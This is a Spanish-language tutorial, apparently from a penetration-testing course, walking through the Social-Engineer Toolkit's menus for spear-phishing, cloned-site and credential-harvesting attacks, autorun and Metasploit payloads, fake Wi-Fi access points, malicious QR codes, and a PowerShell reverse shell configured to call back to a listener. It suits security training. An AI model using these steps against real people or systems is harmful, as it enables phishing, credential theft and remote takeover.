SET - Social-Engineering Toolkit
Presentación de Social-Engineering Toolkit
SET es un software desarrollado en Python que ofrece varias funciones para abusar de las técnicas de social engineering. La social engineering se refiere a las técnicas para manipular a los seres humanos.
root@kali:~# setoolkit
..######..########.########
.##....##.##..........##...
.##.......##..........##...
..######..######......##...
.......##.##..........##...
.##....##.##..........##...
..######..########....##...
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 7.7.9
Codename: 'Blackout'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com ...
Spear-Phishing Attack Vectors
La sección Spear-Phishing Attack Vectors permite realizar ataques de tipo spear-phishing. A diferencia de los ataques tradicionales de phishing, el spear-phishing se distingue por la personalización del mensaje gracias a la información obtenida previamente.
set> 1
The Spearphishing module allows you to specially craft email
messages and send them to a large (or small) number of people
with attached fileformat malicious payloads. If you want to spoof
your email address, be sure "Sendmail" is installed (apt-get
install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting
SET do everything for you (option 1), the second is to create your own
FileFormat payload and use it in your own attack. Either way, good
luck and enjoy!
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
99) Return to Main Menu
Website Attack Vectors
La sección Website Attack Vectors permite configurar un sitio web malicioso con el objetivo de explotar una vulnerabilidad en el navegador de la víctima, o jugar a la social engineering para que la víctima realice una acción que permita al atacante tomar el control de la máquina de forma remota:
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
Dado que no podemos revisar todos los vectores de ataque, nos centraremos en los dos primeros utilizando el Framework Metasploit.
1. Java Applet Attack Method
Como su nombre indica, la sección Java Applet Attack Method permite no solo crear un applet Java malicioso, sino también clonar un sitio web para hacer que el ataque sea particularmente complejo de identificar:
1)Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen...
Infectious Media Generator
La sección Infectious Media Generator permite crear archivos autorun.inf para añadir a memorias USB o CD/DVD, así como una payload Metasploit. Una vez que se inserta la llave USB o el CD/DVD, el autorun ejecutará automáticamente la carga.
En Windows, los archivos autorun.inf ya no se ejecutan de forma automática ni silenciosa desde Windows Vista.
El parche KB971029 también permite limitar estas ejecuciones automáticas en Windows XP.
Create a Payload and Listener
La sección Create a Payload and Listener hace que sea relativamente fácil generar una payload y ejecutar un agente de escucha dentro de Metasploit.
Por ejemplo, se pueden usar las siguientes acciones para crear un archivo malintencionado que ejecute un reverse Meterpreter:
set> 4
1) Windows Shell Reverse_TCP Spawn a command shell on
victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell
on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim
and send back to attacker
4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell,
Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP X64 Connect back to the
attacker (Windows x64), Meterpreter
6) Windows Meterpreter Egress Buster Spawn a meterpreter shell
and find a port home via multiple ports
7) Windows Meterpreter Reverse HTTPS Tunnel communication over
HTTP using SSL and use Meterpreter
8) Windows Meterpreter Reverse DNS Use a hostname instead of
an IP address and use Reverse Meterpreter...
Mass Mailer Attack
Como su propio nombre indica, la sección Mass Mailer Attack permite hacer phishing masivo a una o más direcciones. Este módulo también permite insertar enlaces o archivos maliciosos dentro de los correos electrónicos enviados.
set> 5
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
99. Return to main menu.
Arduino-Based Attack Vector
La sección Arduino-Based Attack Vector permite transformar un Arduino para programarlo con el objetivo de realizar ataques físicos. Estos ataques físicos se basan en el hecho de que este tipo de dispositivo es capaz de fingir ser un ratón o el teclado y de esta manera eludir diversas medidas de protección. Esto generalmente se conoce como USB HID (dispositivo Human Interface Device) Attack.
Wireless Access Point Attack Vector
La sección Wireless Access Point Attack Vector permite crear un punto de acceso Wi-Fi falso mediante la suite Aircrack-ng. De hecho, gracias a Airbase-ng, AirMon-ng, DNSSpoof y dhcp3, SET crea un punto de acceso y redirige todas las consultas DNS a la máquina del atacante. Entonces, simplemente será necesario redirigir a las víctimas a un ataque visto anteriormente.
QRCode Generator Attack Vector
Al igual que la sección Wireless Access Point Attack Vector, la sección QRCode Generator Attack Vector no permite realizar ataques. Sin embargo, generar un QRCode puede camuflar URL maliciosas:
set> 8
The QRCode Attack Vector will create a QRCode for you with whatever
URL you want.
When you have the QRCode Generated, select an additional attack vector
within SET and deploy the QRCode to your victim. For example, generate
a QRCode of the SET Java Applet and send the QRCode via a mailer.
Enter the URL you want the QRCode to go to (99 to exit):
https://www.qr-code-generator.com/
[*] QRCode has been generated under
/root/.set/reports/qrcode_attack.png
Una vez generado, lo único que falta es transmitir a un objetivo potencial el QRCode que apunta a una URL maliciosa:
Powershell Attack Vectors
Por último, la sección Powershell Attack Vectors permite crear código malintencionado en PowerShell para que se ejecute en un sistema de tipo Windows:
set> 9
The Powershell Attack Vector module allows you to create PowerShell
specific attacks. These attacks will allow you to use PowerShell which
is available by default in all operating systems Windows Vista and
above. PowerShell provides a fruitful landscape for deploying
payloads and performing functions that do not get triggered
by preventative technologies.
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
set:powershell>2
Enter the IPAddress or DNS name for the reverse host: 192.168.171.152
set:powershell> Enter the port for listener [443]: 443
[*] Rewriting the powershell reverse shell with options
[*] Exporting the powershell stuff to /root/.set/reports/powershell
set> Do you want to start a listener [yes/no]: yes
Listening on 0.0.0.0:443
En este caso, el reverse shell en PowerShell se encuentra en el archivo /root/.set/reports/powershell/powershell.reverse.txt...